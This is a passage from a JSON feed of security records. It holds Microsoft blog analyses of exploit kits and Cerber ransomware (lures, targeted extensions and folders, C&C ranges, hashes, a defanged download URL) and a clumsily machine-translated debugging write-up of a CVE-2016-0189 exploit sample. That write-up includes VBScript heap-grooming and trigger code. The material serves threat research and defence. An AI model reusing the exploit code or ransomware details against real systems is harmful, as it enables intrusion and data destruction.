was also SundownEK that integrated steganography in late 2016. Steganography, a technique that is not new but getting more popular with cybercriminals, hides information like malicious code or encryption keys in images.\n\nInstead of loading the exploit directly from a landing page, SundownEK downloads an image that contains the exploit code. This method is employed to avoid detection.\n\n## Stopping exploit kits with updates and a secure platform\n\nWhile we see a willingness among cybercriminals to switch from exploit kits to spam and other vectors, there is a clear desire to continue using kits. We see cybercriminals switch from one kit to another, replacing kits as they become unavailable. Meanwhile, exploit kit authors continue to keep their wares attractive to cybercriminals by incorporating new exploits.\n\nKeeping browsers and other software up-to-date can counter the impact of exploit kits. [Microsoft Edge](<https://technet.microsoft.com/itpro/microsoft-edge/index>) is a secure browser that gets updated automatically by default. It also has multiple built-in [defenses](<https://microsoft.sharepoint.com/teams/osg_core_dcp/cpub/partner/antimalware/Shared Documents/8438038_RS2_Blogs/2016 in Review series/-%09https:/www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) against exploit kits that attempt to download and install malware. These defenses include on-by-default sandboxing and state of the art exploit mitigation technologies. Additionally, [Microsoft SmartScreen](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/#3FYqD02TC1A6VsaL.97>), which is used in both Microsoft Edge and Internet Explorer 11, blocks malicious pages, such as landing pages used by exploit kits.\n\nAt the same time, running a secure platform like Windows 10 enables users to benefit from advanced security features.\n\n[Windows Defender](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) uses IExtensionValidation (IEV) in Microsoft Internet Explorer 11 to detect exploits used by exploit kits. Windows Defender can also detect the malware that exploit kits attempt to download and execute.\n\nWindows 10 Enterprise includes [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>), which can lock down devices and provide kernel-level virtualization based security.\n\n[Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) alerts security operation teams about suspicious activities, including exploitation of vulnerabilities and the presence of malware, allowing them to detect, investigate, and respond to attacks.\n\n \n\n_MMPC_\n\n \n\n## Related blog entries:\n\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-23T22:37:34", "title": "Exploit kits remain a cybercrime staple against outdated software \u2013 2016 threat landscape review series", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-01-23T22:37:34", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/", "id": "MMPC:A8911A071FAE866BC15F59CA0B325D45", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: Read our latest comprehensive report on ransomware: _[**_Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene_**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>)_.)_\n\n \n\nAs everybody else winds down for the holidays, the cybercriminals behind [Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Cerber>) are busy ramping up their operations.\n\nFollowing our discovery of a spam campaign that takes advantage of [holiday shopping](<https://blogs.technet.microsoft.com/mmpc/2016/12/13/been-shopping-lately-fake-credit-card-email-can-spook-you-into-downloading-cerber-ransomware/>), we found two new campaigns that continue distributing the latest variants of Cerber [ransomware](<https://blogs.technet.microsoft.com/mmpc/tag/ransomware/>). These campaigns are the latest in a series of persistent cybercriminal efforts that keep Cerber constantly active.\n\n![cerber-machine-encounters](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-machine-encounters.png)\n\n_Figure 1. Cerber activity trending in the past three months_\n\nFirst, we detected a fresh spam campaign that delivers document files in password-protected .zip archives. The emails use simple subject lines like \u201cHowdy\u201d or \u201cHello\u201d, while the email body seem to keep the holiday shopping theme with messages like \u201cyour order should be delivered today\u201d and \u201cStatement is attached\u201d. The password to the archive, which is usually \u201c6666\u201d in this campaign, is in the email body.\n\n![cerber-email-1](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-email-1.png)\n\n_Figure 2. Sample spam email from recent Donoff campaign that distributes a new version of Cerber_\n\nWhen extracted, the document files run malicious macro code detected by Windows Defender as [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:O97M/Donoff>). Donoff is a Trojan downloader that installs malware; in this campaign, it downloads and executes Cerber.\n\nOur tracking of Donoff activity shows a spike corresponding to the email campaign.\n\n![cerber-donoff-activity](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-donoff-activity.png)\n\n_Figure 3. Donoff activity for the past 30 days_\n\nThe second campaign that we discovered distributing Cerber ransomware uses the RIG exploit kit, which Windows Defender detects as [Exploit:HTML/Meadgive](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Exploit:HTML/Meadgive.W>). When a user accesses a compromised page or an attacker-controlled website hosting the exploit kit, vulnerabilities like [CVE-2015-8651](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8651>) are exploited, and Cerber is downloaded and executed on the computer.\n\nTelemetry from Windows Defender shows that this latest exploit kit attack that leads to Cerber largely affects Asia and Europe.\n\n![cerber-rig-exploit-distribution](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-rig-exploit-distribution.png)\n\n_Figure 4. Geographic distribution of victims of recent RIG exploit kit distributing Cerber_\n\nThe two campaigns deliver variants of the new version of Cerber ransomware. These new iterations of the malware sport updated configuration and behavior, demonstrating that the cybercriminals behind them are not slowing down in evolving the malware.\n\nBelow are the notable updates seen in the latest version of Cerber:\n\n 1. As with the [holiday-themed campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/13/been-shopping-lately-fake-credit-card-email-can-spook-you-into-downloading-cerber-ransomware/>) from a few weeks ago, these new Cerber variants arrive with a wallpaper that is noticeably modified from previous versions\u2019 green palette to red: \n![cerber-christmas-wallpaper](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-christmas-wallpaper.png) \n_Figure 5. New Cerber wallpaper, which changed its color palette _\n 2. Another level of obfuscation is used: UPX on the top of the Nullsoft installer and custom encryption used by older versions.\n 3. The configuration, which contains the most important data that determine the behavior of the ransomware, are encrypted using RC4 just like older versions, but using Crypto APIs instead of custom implementation.\n 4. Threat version information, which has been useful in tracking the evolution of Cerber, is nowhere to be found in the configuration.\n 5. More than 50 new file name extensions are added as targets for encryption; on the other hand, several file name extensions, including .exe., .cmd, and .msi, are exempted from the encryption routine; this latter behavior has been observed in other prominent ransomware families, but we\u2019re seeing it for the first time with Cerber.\n 6. Folders that are prioritized during encryption include new ones, like _microsoft\\onenote_, _microsoft\\outlook_, and _\\microsoft\\excel\\_, among others; however, folders that are exempted from the encryption routine now include \"$windows.~ws\", \"intel\", and \"windows10upgrade\", among others\n 7. Shadow copies are no longer deleted.\n 8. Payment site provided is now a single Tor proxy site, compared to three proxy sites in older versions.\n 9. The cybercriminals added two new sets of IP ranges where command-and-control (C&C) servers reside.\n\nFor cybercriminals, releasing a new version of malware not only increases likelihood of evading antivirus detection; it\u2019s also a way of increasing the complexity of malware. Cerber\u2019s long list of updated behavior indicates that the cybercriminals are highly motivated to continue improving the malware and the campaigns that deliver it.\n\nIt is important to note that one of the most critical updates in this latest version of Cerber is the new folders it prioritizes during encryption. The added folders, which include _microsoft\\onenote_, _microsoft\\outlook_, and _\\microsoft\\excel\\_ among others, is further indication that the malware is designed to look for critical Microsoft Office files to encrypt in enterprise environments.\n\n## Stopping Cerber infection in Windows 10\n\nWindows 10 has security technologies that can detect this new batch of updated Cerber ransomwre. Keep your computers up-to-date in order to get the benefits from the latest features and proactive mitigation built into the latest versions of Windows.\n\n[Windows Defender](<https://support.microsoft.com/en-us/help/17464/windows-defender-help-protect-computer?ocid=-2147269815>) detects the new version of Cerber ransomware as [Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Cerber>). It also detects files related to the two campaigns that deliver the ransomware: the malicious attachments used in the spam campaign as [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=TrojanDownloader%3AO97M%2FDonoff>), and the RIG exploit kit as [Exploit:HTML/Meadgive](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Exploit:HTML/Meadgive.W>).\n\n[Microsoft Edge](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/>) can help prevent exploit kits from running and executing ransomware on computers. [SmartScreen Filter](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/>) uses URL reputation to block access to malicious sites, such as those hosting exploit kits.\n\n[Office 365 Advanced Threat Protection](<https://blogs.office.com/2016/01/14/leading-the-way-in-the-fight-against-dangerous-email-threats/>) blocks malicious emails that spread malicious documents that could eventually install Cerber.\n\n[Device guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) protects systems from malicious applications like ransomware by maintaining a custom catalog of known good applications and stopping kernel-level malware with virtualization-based security.\n\nIT administrators can use [Group Policy in Office 2016](<https://blogs.technet.microsoft.com/mmpc/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/>) to block known malicious macros, such as the documents in password-protected email attachments used in this campaign, from running. They can also use [AppLocker group policy](<http://social.technet.microsoft.com/wiki/contents/articles/5211.how-to-configure-applocker-group-policy-to-prevent-software-from-running.aspx>) to prevent dubious software from running.\n\nIT administrators can also use [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) to get alerts when suspicious activities are observed in the network. Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection - Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## An in-depth look at the spam campaign\n\nBeyond providing protection, Microsoft Malware Protection Center (MMPC) monitors and analyzes Cerber and related campaigns in-depth in order to discern trends and gain deeper understanding of cybercriminal activity. This is how we were able to trace the evolution of Cerber and see the signs that it\u2019s not letting up.\n\nCerber has historically heavily used email as a primary infection vector. It is no different in this campaign.\n\n![cerber-email-2](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-email-2.png)\n\n_Figure 6. Another sample spam email from recent Donoff campaign that distributes a new version of Cerber_\n\nThe attachment is usually a password-protected .zip archive that contains a macro malware in the form of a Microsoft Word document. When opened, the archive prompts for a password, which is indicated in the email body. This is a change from past campaigns, which password-protected the document, rather than the .zip file itself.\n\n![cerber-zip-password](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-zip-password.png)\n\n_Figure 7. Attachment is a password-protected .zip archive_\n\nWhen extracted and executed, the document attempts to run its malicious macro code. Thus, Microsoft Office warns users about manually enabling macro, empowering users to block infection at this point. The document lures users to enable macro by faking a Microsoft Word message.\n\n![cerber-macro](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-macro.png)\n\n_Figure 8. Malicious document lures users into enabling macro_\n\nThe macro code contains obfuscated downloading routines, as seen below.\n\n![cerber-macro-code](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-macro-code.png)\n\n_Figure 9. Malware code showing obfuscated download link_\n\nThe macro code executes the following PowerShell command to attempt to download and execute Cerber in the _%AppData%_ folder:\n\n![cerber-macro-powershell](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-macro-powershell.png)\n\n_Figure 10. Malware code showing PowerShell command_\n\n## An in-depth look at the new Cerber version\n\nThe latest version of Cerber protects the configuration data embedded in the malware binary using RC4. However, while older versions use custom codes to implement RC4, this new version uses Crypto APIs. The RC4 key is still embedded in the malware binary.\n\n![cerber-malware-code-1](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-malware-code-1.png)\n\n_Figure 11. Code to pass RC4key and encrypted config data to the decryptor_\n\n![cerber-malware-code-2](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-malware-code-2.png)\n\n_Figure 12. RC4 decryption using crypto APIs_\n\nCerber adds more than 50 file name extensions to its file encryption routine, bringing the total number of target file types to 493:\n\n.123 | .1cd | .3dm | .3ds | .3fr | .3g2 | .3gp | .3pr | .602 \n---|---|---|---|---|---|---|---|--- \n.7z | .7zip | .aac | .ab4 | .abd | .acc | .accdb | .accde | .accdr \n.accdt | .ach | .acr | .act | .adb | .adp | .ads | .aes | .agdl \n.ai | .aiff | .ait | .al | .aoi | .apj | .apk | .arc | .arw \n.ascx | .asf | .asm | .asp | .aspx | .asset | .asx | .atb | .avi \n.awg | .back | .backup | .backupdb | .bak | .bank | .bat | .bay | .bdb \n.bgt | .bik | .bin | .bkp | .blend | .bmp | .bpw | .brd | .bsa \n.bz2 | .c | .cash | .cdb | .cdf | .cdr | .cdr3 | .cdr4 | .cdr5 \n.cdr6 | .cdrw | .cdx | .ce1 | .ce2 | .cer | .cfg | .cfn | .cgm \n.cib | .class | .cls | .cmd | .cmt | .config | .contact | .cpi | .cpp \n.cr2 | .craw | .crt | .crw | .cry | .cs | .csh | .csl | .csr \n.css | .csv | .d3dbsp | .dac | .das | .dat | .db | .db3 | .db_journal \n.dbf | .dbx | .dc2 | .dch | .dcr | .dcs | .ddd | .ddoc | .ddrw \n.dds | .def | .der | .des | .design | .dgc | .dgn | .dif | .dip \n.dit | .djv | .djvu | .dng | .doc | .docb | .docm | .docx | .dot \n.dotm | .dotx | .drf | .drw | .dtd | .dwg | .dxb | .dxf | .dxg \n.edb | .eml | .eps | .erbsql | .erf | .exf | .fdb | .ffd | .fff \n.fh | .fhd | .fla | .flac | .flb | .flf | .flv | .forge | .fpx \n.frm | .fxg | .gbr | .gho | .gif | .gpg | .gray | .grey | .groups \n.gry | .gz | .h | .hbk | .hdd | .hpp | .html | .hwp | .ibank \n.ibd | .ibz | .idx | .iif | .iiq | .incpas | .indd | .info | .info_ \n.iwi | .jar | .java | .jnt | .jpe | .jpeg | .jpg | .js | .json \n.k2p | .kc2 | .kdbx | .kdc | .key | .kpdx | .kwm | .laccdb | .lay \n.lay6 | .lbf | .lck | .ldf | .lit | .litemod | .litesql | .lock | .ltx \n.lua | .m | .m2ts | .m3u | .m4a | .m4p | .m4u | .m4v | .ma \n.mab | .mapimail | .max | .mbx | .md | .mdb | .mdc | .mdf | .mef \n.mfw | .mid | .mkv | .mlb | .mml | .mmw | .mny | .money | .moneywell \n.mos | .mov | .mp3 | .mp4 | .mpeg | .mpg | .mrw | .ms11 | .msf \n.msg | .mts | .myd | .myi | .nd | .ndd | .ndf | .nef | .nk2 \n.nop | .nrw | .ns2 | .ns3 | .ns4 | .nsd | .nsf | .nsg | .nsh \n.nvram | .nwb | .nx2 | .nxl | .nyf | .oab | .obj | .odb | .odc \n.odf | .odg | .odm | .odp | .ods | .odt | .ogg | .oil | .omg \n.one | .onenotec2 | .orf | .ost | .otg | .oth | .otp | .ots | .ott \n.p12 | .p7b | .p7c | .pab | .pages | .paq | .pas | .pat | .pbf \n.pcd | .pct | .pdb | .pdd | .pdf | .pef | .pem | .pfx | .php \n.pif | .pl | .plc | .plus_muhd | .pm! | .pm | .pmi | .pmj | .pml \n.pmm | .pmo | .pmr | .pnc | .pnd | .png | .pnx | .pot | .potm \n.potx | .ppam | .pps | .ppsm | .ppsx | .ppt | .pptm | .pptx | .prf \n.private | .ps | .psafe3 | .psd | .pspimage | .pst | .ptx | .pub | .pwm \n.py | .qba | .qbb | .qbm | .qbr | .qbw | .qbx | .qby | .qcow \n.qcow2 | .qed | .qtb | .r3d | .raf | .rar | .rat | .raw | .rb \n.rdb | .re4 | .rm | .rtf | .rvt | .rw2 | .rwl | .rwz | .s3db \n.safe | .sas7bdat | .sav | .save | .say | .sch | .sd0 | .sda | .sdb \n.sdf | .secret | .sh | .sldm | .sldx | .slk | .slm | .sql | .sqlite \n.sqlite-shm | .sqlite-wal | .sqlite3 | .sqlitedb | .sr2 | .srb | .srf | .srs | .srt \n.srw | .st4 | .st5 | .st6 | .st7 | .st8 | .stc | .std | .sti \n.stl | .stm | .stw | .stx | .svg | .swf | .sxc | .sxd | .sxg \n.sxi | .sxm | .sxw | .tar | .tax | .tbb | .tbk | .tbn | .tex \n.tga | .tgz | .thm | .tif | .tiff | .tlg | .tlx | .txt | .uop \n.uot | .upk | .usr | .vb | .vbox | .vbs | .vdi | .vhd | .vhdx \n.vmdk | .vmsd | .vmx | .vmxf | .vob | .vpd | .vsd | .wab | .wad \n.wallet | .war | .wav | .wb2 | .wk1 | .wks | .wma | .wmf | .wmv \n.wpd | .wps | .x11 | .x3f | .xis | .xla | .xlam | .xlc | .xlk \n.xlm | .xlr | .xls | .xlsb | .xlsm | .xlsx | .xlt | .xltm | .xltx \n.xlw | .xml | .xps | .xxx | .ycbcra | .yuv | .zip | | \n \n \n\nHowever, new to this version is a list of file name extensions exempted from encryption:\n\n * .bat\n * .cmd\n * .com\n * .cpl\n * .dll\n * .exe\n * .hta\n * .msc\n * .msi\n * .msp\n * .pif\n * .scf\n * .scr\n * .sys\n\nIt adds new folders to a list that it prioritizes when searching for files to encrypt, indicating this new version is particularly going after Microsoft Office documents:\n\n * \\bitcoin\\ (new)\n * \\excel\\\n * \\microsoft sql server\\\n * \\microsoft\\excel\\ (new)\n * \\microsoft\\microsoft sql server\\\n * \\microsoft\\office\\ (new)\n * \\microsoft\\onenote\\ (new)\n * \\microsoft\\outlook\\ (new)\n * \\microsoft\\powerpoint\\ (new)\n * \\microsoft\\word\\ (new)\n * \\office\\ (new)\n * \\onenote\\\n * \\outlook\\\n * \\powerpoint\\\n * \\steam\\\n * \\the bat!\\\n * \\thunderbird\\\n * \\word\\ (new)\n\nBut it adds a few more folders to its list of exemptions:\n\n * \\$getcurrent\\ (new)\n * \\$recycle.bin\\ (new)\n * \\$windows.~bt\\\n * \\$windows.~ws\\ (new)\n * \\boot\\\n * \\documents and settings\\all users\\\n * \\documents and settings\\default user\\\n * \\documents and settings\\localservice\\\n * \\documents and settings\\networkservice\\\n * \\intel\\ (new)\n * \\msocache\\ (new)\n * \\perflogs\\ (new)\n * \\program files (x86)\\\n * \\program files\\\n * \\programdata\\\n * \\recovery\\ (new)\n * \\recycled\\ (new)\n * \\recycler\\ (new)\n * \\system volume information\\ (new)\n * \\temp\\ (new)\n * \\users\\all users\\\n * \\windows.old\\\n * \\windows10upgrade\\ (new)\n * \\windows\\\n * \\winnt\\ (new)\n * \\appdata\\local\\\n * \\appdata\\locallow\\\n * \\appdata\\roaming\\ (made more generic)\n * \\local settings\\\n * \\public\\music\\sample music\\\n * \\public\\pictures\\sample pictures\\\n * \\public\\videos\\sample videos\\\n * \\tor browser\\\n\nIt drops the ransom note, which contains instruction for decryption, as __README_{RAND}_.hta_; for example, __README_2Rg927_.hta._\n\n![cerber-instructions](https://msdnshared.blob.core.windows.net/media/2016/12/cerber-instructions1.png)\n\n_Figure 13. Ransom note_\n\nAs of this writing, Cerber uses two new sets of IP ranges where C&C server could reside:\n\n * 17.1.32.0/27 (new)\n * 78.15.15.0/27 (new)\n * 194.165.16.0/22\n| \n\n * 37.15.20.0/27 (new)\n * 77.1.12.0/27 (new)\n * 91.239.24.0/23 (new) \n---|--- \n \n## Indicators of compromise\n\nThe following files were used for this analysis:\n\nMalicious .zip attachment:\n\n * 7be5e805c5bcb57fcfc3a9ab37292603d73086c4\n\nExtracted document with macro code:\n\n * 6a9e8990add357af0621dcd04600e5fcc9ebac23\n\nCerber variants downloaded by macro malware from _hxxps:// hl3gj7zkxjvo6cra.onion.to/svchost.exe_:\n\n * 4f02e747bc68262c2cf24dffaf792d51a57b02bd\n * 60c4c6e3f6d196278c0fd111aec0faafb003c4a0\n * 99f49b70685803e019734c457b1c77e9c7de5531\n * 55f72229d0552daf28744c97c88585b585fa159b\n * 8994e43317df691ad9796c95700a827ca613bdca\n * 7b318f8a59dc2a6ecd261ffd9b6ab27287a811d6\n * e049242200300dbce7aaf80c2235b94d0cea582a\n * ab0e408c2fc40996c8b9c3ab6e3aa1f88d22b656\n * 9d5ae07111c8c89d4fa92160c00f669f8eb15ddd\n * c46a426459c170c886e9f49b0c07cd3f1cc61ff2\n * 3fc3b16b915a17cb1c2c8e853c3f0a0c11c3715b\n * 3352c25b4dc695a344d4ca34c3efdc1e95a7b0ce\n * 5a7116673ab853505e2861240bf3a3d6cfccfc27\n * 5c09449b2413c41cf8f1ec64698d9bc4571ed744\n * 350ee3cee88cb1bb11cddc5c7e55eccadd3dc8fe\n * 67c948556bc2fabfcdc4e4dbcf2bf14cdbe73d51\n * f39b72e853ed743b8a9a2946d79f4fa1c91bfd5e\n\nCerber variants installed by RIG (aka Meadgive) exploit kit:\n\n * 9952b68f6d7965f9775946ba6d78638efa00d5e4\n * 75dcf470ef61b63f76865df9c1ed8edcf1c3f6d9\n\n## \n\n_Rodel Finones and Francis Tan Seng_\n\n_MMPC_\n\n \n\n## Related blog entries\n\n * [WannaCrypt ransomware worm targets out-of-date systems](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>)\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-22T04:06:47", "title": "No slowdown in Cerber ransomware activity as 2016 draws to a close", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2016-12-22T04:06:47", "href": "https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/", "id": "MMPC:0CBDFDEA590166A1E24CF4941C0CD670", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:15", "description": "Last year at the end of 10, I get a public view is not quite the same as CVE-2016-0189 the use of samples. Preliminary analysis, I think this should be the year CVE-2016-0189 of the original Attack File. Its confused approach and subsequent occurrence of CVE-2017-0149, CVE-2018-8174, CVE-2018-8373 exactly the same. Its use and loading shellcode techniques are also behind several utilizing the same. \nAt the time I at hand with other things, and not to the sample were carefully studied. A few days ago, I re-dug out the relevant samples for a lot of debugging. \nThis article I will describe the CVE-2016-0189 sample use of the way, the reader later will be seen, the use of the process of dislocation techniques and CVE-2014-6332, CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373 almost the same. \nBefore the public vision of the CVE-2016-0189 sample, the basic is a reference to this article in the publication of the code, with regard to this disclosure code use of the details, I'm in before articles have detailed analysis. \nBelow we to a glimpse of 3 years ago CVE-2016-0189 actual 0day samples using the technique. \n\nMemory layout \nAs of the present in by means of the following code into the function \ndocument. write(\" var obj = {}; obj. toString = function() { my_valueof(); return 0;}; StartExploit(obj); \" &Unescape(\"%3c/script%3e\")) \nIn StartExploit function, first call the prepare function of the memory layout. Each execution of arr2(i) = Null will lead to a tagSAFEARRAY structure of the body memory is recovered. \nReDim arr(0, 0) \narr(0, 0) = 3 'this is an important step, the digital 3 in the dislocation will be interpreted as a vbLong type \n... \nSub prepare \nDim arr5() \nReDim arr5(2) \nFor i = 0 To 17 \narr3(i) = arr5 \nNext \nFor i = 0 To &h7000 \narr1(i) = arr \nNext \nFor i = 0 To 1999 \narr2(i) = arr 'will arr2 each member is initialized to an array \nNext \nFor i = 1000 To 100 Step -3 \narr2(i)(0, 0) = 0 \narr2(i) = Null 'release arr2(100) ~ arr2(1000) between the 1/3 of the elements \nNext \nReDim arr4(0, &hFFF) 'defined arr4 \nEnd Sub \nFunction StartExploit(js_obj) \n'Omitted unrelated code \nprepare \narr4(js_obj, 6) = &h55555555 \nFor i = 0 To 1999 \nIf IsArray(arr2(i)) = True Then \nIf UBound(arr2(i), 1) > 0 Then \nvul_index = i \nExit For \nEnd If \nEnd If \nNext \nlb_index = LBound(arr2(i), 1) \nIf prepare_rw_mem() = True Then \nElse \nExit Function \nEnd If \naddr = leak_addr() \n'Omitted in the subsequent code \nEnd Function \nEach tagSAFEARRAY in memory occupies a size of 0x30 bytes, wherein after the 0x20 bytes stored tagSAFEARRAY the actual data. \n0:015> ! heap-p-a 052a9fb0 \naddress 052a9fb0 found in \n_HEAP @ 360000 \nHEAP_ENTRY Size Prev Flags UserPtr UserSize - state \n052a9f98 0007 0000 [00] 052a9fa0 00030 - (busy) \n0:015> dd 052a9fa0 l30/4 \n052a9fa0 00000000 00000000 00000000 0000000c \n052a9fb0 08800002 00000010 00000000 0529d640 \n052a9fc0 00000001 00000000 00000001 00000000 \n0:015> dt ole32! tagSAFEARRAY 052a9fb0 \n+0x000 cDims : 2 \n+0x002 fFeatures : 0x880 \n+0x004 cbElements : 0x10 \n+0x008 cLocks : 0 \n+0x00c pvData : 0x0529d640 \n+0x010 rgsabound : [1] tagSAFEARRAYBOUND \nThe entire release process resulting in approximately 300 0x30 size of the memory hole. \n\nTo trigger the vulnerability \nMemory layout is completed, the use of the code by arr4(js_obj, 6) = &h55555555 this operation enters the custom my_valueof callback function, and then in the callback function re-definition of arr4 on. This leads to arr4 corresponding to the original pvData memory is released, and according to the required size to apply the new memory. \nSub my_valueof() \nReDim arr4(2, 0) \nEnd Sub \nThe above statements will result in arr4(2, 0)corresponding to the pvData to apply a size of 0x30 in the memory, with associated memory distribution characteristics, this process will reuse a block just released tagSAFEARRAY memory. \nWe take a closer look at arr4(js_obj, 6) = &h55555555 statement execution logic. \nCVE-2016-0189 causes that AccessArray encountered in javascript objects can lead to a pair of overloaded function callback my_valueof, use the code in my_valueof will arr4 re-defined as arr4(2, 0), when the callback is completed is again returned to the AccessArray, the arr4-related tagSAFEARRAY structure of the body and the pvData pointer have been modified, and the AccessArray will continue to under perform when still in accordance with the arr4(0, 6)in the calculation of element address, and the calculated address is stored to a stack variable. \n\n\n**[1] [[2]](<94507_2.htm>) [[3]](<94507_3.htm>) [[4]](<94507_4.htm>) [next](<94507_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "For a suspected CVE-2016-0189 the original attack sample debugging-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 